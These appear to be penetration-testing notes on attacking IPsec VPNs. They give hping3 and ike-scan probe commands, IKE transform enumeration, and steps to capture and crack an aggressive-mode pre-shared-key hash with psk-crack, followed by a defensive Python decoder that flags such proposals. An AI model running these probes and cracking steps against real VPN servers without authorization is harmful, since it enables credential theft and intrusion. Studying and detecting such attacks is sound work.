Attacking VPNs
The VPN Hacker's Toolkit
IPsec tools: Used for building IPsec tunnels
IKE-scan: An IKE probing utility
PSK-crack: A tool for cracking PSKs used by IKE
OpenSSL: Client-server tools for SSL/TLS negotiations
VPN clients
VPN Hacking Methodology
Identify the VPN technology in use
Establish initial communications with the server; identify the authentication methods and encryption method in use
Perform a "handshake" with the server and look for information leaks.
Identify vulnerabilities for exploitation using leaked information.
Crafting Hping3 commands
# Send SYN packets
hping3 -S -p 53 <TargetIP>
# Send UDP packets to port 500 (used by IKE)
hping3 --udp -p 500 <TargetIP>
# Bash loop that reads udp.txt and sends one probe to each UDP port number listed
for port in $(cat udp.txt); do echo "TESTING UDP PORT: $port"; hping3 -2 -p "$port" -c 1 <TargetIP>; done
IKE-scan
ike-scan sends IKE phase-1 proposals to the target and reports how the server responds
# IKE-scan
# Uses defaults: 3DES encryption, SHA1 Hash, PSK Authentication, DH Group 2
ike-scan <TargetIP>
# Default SA spelled out as enc,hash,auth,group: 3DES (5), SHA1 (2), PSK (1), DH Group 2 (2)
ike-scan --trans=5,2,1,2 <TargetIP>
# This command will use the following:
# DES-CBC Encryption, MD5 Hash, PSK Auth, DH Group 1
ike-scan --trans=1,1,1,1 <TargetIP>
# Newer method for specifying transforms
ike-scan --trans="(1=5,2=2,3=1,4=2)" <TargetIP>
# Runs scan in aggressive mode
ike-scan -A <TargetIP>
# If aggressive mode returns an Auth=PSK response, the server might be vulnerable.
# Attempt to extract the key
ike-scan -A <TargetIP> --pskcrack=pskhash
# If the previous command works, you will have a file named pskhash
# Attempt to crack the hash
psk-crack pskhash
IKEmulti
ikemulti.py: tries multiple transforms in turn
# Running ikemulti.py
python ikemulti.py -i <TargetIP>
Aggressive Mode
Main mode can be thought of as the normal way of exchanging information
Aggressive mode is designed to speed up the process and perform a faster handshake with fewer messages
Aggressive mode can leak information
If this mode is used with a PSK, the hash derived from the key can be captured and cracked offline before the key is ever used to authenticate
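Added example, not part of these notes: a small decoder for the first IKEv1 phase-1 packet on UDP/500. It shows how the ike-scan --trans numbers (1=enc, 2=hash, 3=auth, 4=group) are literally the ISAKMP transform attribute types carried in the SA payload, and gives a defender a check for aggressive-mode proposals that use PSK authentication. The sample packet is constructed here (SA payload only; a real aggressive-mode message also carries KE, nonce and ID payloads after the SA).

```python
import struct

# RFC 2408 exchange types and RFC 2409 phase-1 attribute types
EXCHANGE_TYPES = {2: "Main Mode", 4: "Aggressive Mode"}
ATTR_NAMES = {1: "enc", 2: "hash", 3: "auth", 4: "group"}
PSK_AUTH = 1  # authentication method value 1 = pre-shared key

def build_phase1_probe(exchange_type, enc=5, hsh=2, auth=1, group=2):
    """Constructed sample: ISAKMP header + one SA/proposal/transform, as ike-scan --trans=enc,hsh,auth,group would send."""
    attrs = b"".join(struct.pack("!HH", 0x8000 | t, v) for t, v in ((1, enc), (2, hsh), (3, auth), (4, group)))
    transform = struct.pack("!BBHBBH", 0, 0, 8 + len(attrs), 1, 1, 0) + attrs       # transform #1, ID KEY_IKE
    proposal = struct.pack("!BBHBBBB", 0, 0, 8 + len(transform), 1, 1, 0, 1) + transform  # PROTO_ISAKMP, no SPI
    sa = struct.pack("!BBHII", 0, 0, 12 + len(proposal), 1, 1) + proposal            # DOI=IPsec, SIT_IDENTITY_ONLY
    # header: initiator SPI, responder SPI, next payload=SA(1), version 1.0, exchange type, flags, msg id, length
    header = struct.pack("!8s8sBBBBII", b"\x11" * 8, b"\x00" * 8, 1, 0x10, exchange_type, 0, 0, 28 + len(sa))
    return header + sa

def parse_ike_phase1(pkt):
    """Return (exchange_type, {attr_type: value}) for the first transform of the first proposal."""
    if len(pkt) < 28:
        raise ValueError("short ISAKMP header")
    if pkt[16] != 1:
        raise ValueError("first payload is not SA")
    exch = pkt[18]
    proposal = 28 + 4 + 8                      # skip generic payload header, DOI and situation
    spi_size = pkt[proposal + 6]
    trans = proposal + 8 + spi_size
    end = trans + struct.unpack("!H", pkt[trans + 2:trans + 4])[0]
    pos, attrs = trans + 8, {}
    while pos + 4 <= end:
        atype, aval = struct.unpack("!HH", pkt[pos:pos + 4])
        if atype & 0x8000:                     # TV format: 2-byte value inline
            attrs[atype & 0x7FFF] = aval
            pos += 4
        else:                                  # TLV format: aval is the length of the value
            attrs[atype] = int.from_bytes(pkt[pos + 4:pos + 4 + aval], "big")
            pos += 4 + aval
    return exch, attrs

def risky_proposal(exch, attrs):
    """True when a peer proposes aggressive mode with PSK auth: the case these notes say leaks a crackable hash."""
    return exch == 4 and attrs.get(3) == PSK_AUTH

def describe(pkt):
    exch, attrs = parse_ike_phase1(pkt)
    fields = " ".join(f"{ATTR_NAMES.get(t, t)}={v}" for t, v in sorted(attrs.items()))
    flag = " [ALERT: aggressive mode + PSK]" if risky_proposal(exch, attrs) else ""
    return f"{EXCHANGE_TYPES.get(exch, exch)} {fields}{flag}"
```

Feeding it real UDP/500 payloads from a capture gives one line per initiator message, so the alert can be raised in the same place as other IKE logging.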